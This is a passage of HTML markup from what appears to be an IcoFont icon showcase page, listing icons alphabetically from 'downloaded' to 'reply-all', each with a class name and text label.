				<div class="icon"> 
					<i class="icofont-downloaded"></i>
				</div> 
				<span> downloaded </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drag"></i>
				</div> 
				<span> drag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drag1"></i>
				</div> 
				<span> drag1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drag2"></i>
				</div> 
				<span> drag2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drag3"></i>
				</div> 
				<span> drag3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-earth"></i>
				</div> 
				<span> earth </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ebook"></i>
				</div> 
				<span> ebook </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-edit"></i>
				</div> 
				<span> edit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eject"></i>
				</div> 
				<span> eject </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-email"></i>
				</div> 
				<span> email </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-envelope-open"></i>
				</div> 
				<span> envelope-open </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-envelope"></i>
				</div> 
				<span> envelope </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eraser"></i>
				</div> 
				<span> eraser </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-error"></i>
				</div> 
				<span> error </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-excavator"></i>
				</div> 
				<span> excavator </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-exchange"></i>
				</div> 
				<span> exchange </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-exclamation-circle"></i>
				</div> 
				<span> exclamation-circle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-exclamation-square"></i>
				</div> 
				<span> exclamation-square </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-exclamation-tringle"></i>
				</div> 
				<span> exclamation-tringle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-exclamation"></i>
				</div> 
				<span> exclamation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-exit"></i>
				</div> 
				<span> exit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-expand"></i>
				</div> 
				<span> expand </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-external-link"></i>
				</div> 
				<span> external-link </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-external"></i>
				</div> 
				<span> external </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eye-alt"></i>
				</div> 
				<span> eye-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eye-blocked"></i>
				</div> 
				<span> eye-blocked </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eye-dropper"></i>
				</div> 
				<span> eye-dropper </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eye"></i>
				</div> 
				<span> eye </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-favourite"></i>
				</div> 
				<span> favourite </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fax"></i>
				</div> 
				<span> fax </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-fill"></i>
				</div> 
				<span> file-fill </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-film"></i>
				</div> 
				<span> film </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-filter"></i>
				</div> 
				<span> filter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fire-alt"></i>
				</div> 
				<span> fire-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fire-burn"></i>
				</div> 
				<span> fire-burn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fire"></i>
				</div> 
				<span> fire </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flag-alt-1"></i>
				</div> 
				<span> flag-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flag-alt-2"></i>
				</div> 
				<span> flag-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flag"></i>
				</div> 
				<span> flag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flame-torch"></i>
				</div> 
				<span> flame-torch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flash-light"></i>
				</div> 
				<span> flash-light </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flash"></i>
				</div> 
				<span> flash </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flask"></i>
				</div> 
				<span> flask </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-focus"></i>
				</div> 
				<span> focus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-folder-open"></i>
				</div> 
				<span> folder-open </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-folder"></i>
				</div> 
				<span> folder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-foot-print"></i>
				</div> 
				<span> foot-print </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-garbage"></i>
				</div> 
				<span> garbage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gear-alt"></i>
				</div> 
				<span> gear-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gear"></i>
				</div> 
				<span> gear </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gears"></i>
				</div> 
				<span> gears </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gift"></i>
				</div> 
				<span> gift </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-glass"></i>
				</div> 
				<span> glass </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-globe"></i>
				</div> 
				<span> globe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-graffiti"></i>
				</div> 
				<span> graffiti </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-grocery"></i>
				</div> 
				<span> grocery </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand"></i>
				</div> 
				<span> hand </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hanger"></i>
				</div> 
				<span> hanger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hard-disk"></i>
				</div> 
				<span> hard-disk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-heart-alt"></i>
				</div> 
				<span> heart-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-heart"></i>
				</div> 
				<span> heart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-history"></i>
				</div> 
				<span> history </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-home"></i>
				</div> 
				<span> home </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-horn"></i>
				</div> 
				<span> horn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hour-glass"></i>
				</div> 
				<span> hour-glass </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-id"></i>
				</div> 
				<span> id </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-image"></i>
				</div> 
				<span> image </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-inbox"></i>
				</div> 
				<span> inbox </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-infinite"></i>
				</div> 
				<span> infinite </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-info-circle"></i>
				</div> 
				<span> info-circle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-info-square"></i>
				</div> 
				<span> info-square </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-info"></i>
				</div> 
				<span> info </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-institution"></i>
				</div> 
				<span> institution </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-interface"></i>
				</div> 
				<span> interface </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-invisible"></i>
				</div> 
				<span> invisible </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jacket"></i>
				</div> 
				<span> jacket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jar"></i>
				</div> 
				<span> jar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jewlery"></i>
				</div> 
				<span> jewlery </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-karate"></i>
				</div> 
				<span> karate </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-key-hole"></i>
				</div> 
				<span> key-hole </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-key"></i>
				</div> 
				<span> key </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-label"></i>
				</div> 
				<span> label </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lamp"></i>
				</div> 
				<span> lamp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-layers"></i>
				</div> 
				<span> layers </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-layout"></i>
				</div> 
				<span> layout </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-leaf"></i>
				</div> 
				<span> leaf </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-leaflet"></i>
				</div> 
				<span> leaflet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-learn"></i>
				</div> 
				<span> learn </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lego"></i>
				</div> 
				<span> lego </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lens"></i>
				</div> 
				<span> lens </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-letter"></i>
				</div> 
				<span> letter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-letterbox"></i>
				</div> 
				<span> letterbox </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-library"></i>
				</div> 
				<span> library </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-license"></i>
				</div> 
				<span> license </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-life-bouy"></i>
				</div> 
				<span> life-bouy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-life-buoy"></i>
				</div> 
				<span> life-buoy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-life-jacket"></i>
				</div> 
				<span> life-jacket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-life-ring"></i>
				</div> 
				<span> life-ring </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-light-bulb"></i>
				</div> 
				<span> light-bulb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lighter"></i>
				</div> 
				<span> lighter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lightning-ray"></i>
				</div> 
				<span> lightning-ray </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-like"></i>
				</div> 
				<span> like </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-line-height"></i>
				</div> 
				<span> line-height </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-link-alt"></i>
				</div> 
				<span> link-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-link"></i>
				</div> 
				<span> link </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-list"></i>
				</div> 
				<span> list </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-listening"></i>
				</div> 
				<span> listening </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-listine-dots"></i>
				</div> 
				<span> listine-dots </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-listing-box"></i>
				</div> 
				<span> listing-box </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-listing-number"></i>
				</div> 
				<span> listing-number </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-live-support"></i>
				</div> 
				<span> live-support </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-location-arrow"></i>
				</div> 
				<span> location-arrow </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-location-pin"></i>
				</div> 
				<span> location-pin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lock"></i>
				</div> 
				<span> lock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-login"></i>
				</div> 
				<span> login </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-logout"></i>
				</div> 
				<span> logout </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lollipop"></i>
				</div> 
				<span> lollipop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-long-drive"></i>
				</div> 
				<span> long-drive </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-look"></i>
				</div> 
				<span> look </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-loop"></i>
				</div> 
				<span> loop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-luggage"></i>
				</div> 
				<span> luggage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lunch"></i>
				</div> 
				<span> lunch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lungs"></i>
				</div> 
				<span> lungs </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-magic-alt"></i>
				</div> 
				<span> magic-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-magic"></i>
				</div> 
				<span> magic </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-magnet"></i>
				</div> 
				<span> magnet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mail-box"></i>
				</div> 
				<span> mail-box </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mail"></i>
				</div> 
				<span> mail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-male"></i>
				</div> 
				<span> male </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-map-pins"></i>
				</div> 
				<span> map-pins </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-map"></i>
				</div> 
				<span> map </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-maximize"></i>
				</div> 
				<span> maximize </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-measure"></i>
				</div> 
				<span> measure </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-medicine"></i>
				</div> 
				<span> medicine </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mega-phone"></i>
				</div> 
				<span> mega-phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-megaphone-alt"></i>
				</div> 
				<span> megaphone-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-megaphone"></i>
				</div> 
				<span> megaphone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-memorial"></i>
				</div> 
				<span> memorial </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-memory-card"></i>
				</div> 
				<span> memory-card </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mic-mute"></i>
				</div> 
				<span> mic-mute </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mic"></i>
				</div> 
				<span> mic </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-military"></i>
				</div> 
				<span> military </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mill"></i>
				</div> 
				<span> mill </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-minus-circle"></i>
				</div> 
				<span> minus-circle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-minus-square"></i>
				</div> 
				<span> minus-square </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-minus"></i>
				</div> 
				<span> minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mobile-phone"></i>
				</div> 
				<span> mobile-phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-molecule"></i>
				</div> 
				<span> molecule </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-money"></i>
				</div> 
				<span> money </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-moon"></i>
				</div> 
				<span> moon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mop"></i>
				</div> 
				<span> mop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-muffin"></i>
				</div> 
				<span> muffin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mustache"></i>
				</div> 
				<span> mustache </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-navigation-menu"></i>
				</div> 
				<span> navigation-menu </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-navigation"></i>
				</div> 
				<span> navigation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-network-tower"></i>
				</div> 
				<span> network-tower </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-network"></i>
				</div> 
				<span> network </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-news"></i>
				</div> 
				<span> news </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-newspaper"></i>
				</div> 
				<span> newspaper </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-no-smoking"></i>
				</div> 
				<span> no-smoking </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-not-allowed"></i>
				</div> 
				<span> not-allowed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-notebook"></i>
				</div> 
				<span> notebook </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-notepad"></i>
				</div> 
				<span> notepad </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-notification"></i>
				</div> 
				<span> notification </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-numbered"></i>
				</div> 
				<span> numbered </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-opposite"></i>
				</div> 
				<span> opposite </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-optic"></i>
				</div> 
				<span> optic </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-options"></i>
				</div> 
				<span> options </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-package"></i>
				</div> 
				<span> package </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-page"></i>
				</div> 
				<span> page </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paint"></i>
				</div> 
				<span> paint </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paper-plane"></i>
				</div> 
				<span> paper-plane </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paperclip"></i>
				</div> 
				<span> paperclip </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-papers"></i>
				</div> 
				<span> papers </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pay"></i>
				</div> 
				<span> pay </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-penguin-linux"></i>
				</div> 
				<span> penguin-linux </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pestle"></i>
				</div> 
				<span> pestle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-phone-circle"></i>
				</div> 
				<span> phone-circle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-phone"></i>
				</div> 
				<span> phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-picture"></i>
				</div> 
				<span> picture </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pine"></i>
				</div> 
				<span> pine </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pixels"></i>
				</div> 
				<span> pixels </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-plugin"></i>
				</div> 
				<span> plugin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-plus-circle"></i>
				</div> 
				<span> plus-circle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-plus-square"></i>
				</div> 
				<span> plus-square </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-plus"></i>
				</div> 
				<span> plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-polygonal"></i>
				</div> 
				<span> polygonal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-power"></i>
				</div> 
				<span> power </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-price"></i>
				</div> 
				<span> price </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-print"></i>
				</div> 
				<span> print </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-puzzle"></i>
				</div> 
				<span> puzzle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-qr-code"></i>
				</div> 
				<span> qr-code </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-queen"></i>
				</div> 
				<span> queen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-question-circle"></i>
				</div> 
				<span> question-circle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-question-square"></i>
				</div> 
				<span> question-square </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-question"></i>
				</div> 
				<span> question </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-quote-left"></i>
				</div> 
				<span> quote-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-quote-right"></i>
				</div> 
				<span> quote-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-random"></i>
				</div> 
				<span> random </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-recycle"></i>
				</div> 
				<span> recycle </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-refresh"></i>
				</div> 
				<span> refresh </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-repair"></i>
				</div> 
				<span> repair </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-reply-all"></i>
				</div> 
